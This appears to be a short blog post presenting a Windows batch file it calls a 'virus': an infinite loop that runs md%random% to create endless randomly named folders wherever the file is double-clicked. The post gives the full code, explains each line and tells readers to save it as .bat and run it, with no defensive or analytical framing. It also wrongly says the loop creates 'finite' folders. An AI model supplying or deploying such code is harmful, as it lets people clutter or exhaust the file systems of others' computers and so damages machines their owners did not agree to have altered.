This batch code is simple and effective virus code.
As usual open notepad and copy the below given code into notepad:
@echo off
:top
md%random%
goto top
@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md%random% is a command that creates folders with random names.
goto top return to label:top, infinite loop.
Save this file with .bat extension(for eg: abc.bat).
Thats all done. Now if you double click the file it will create finite folder wherever the batch file is.
0 comments:
Post a Comment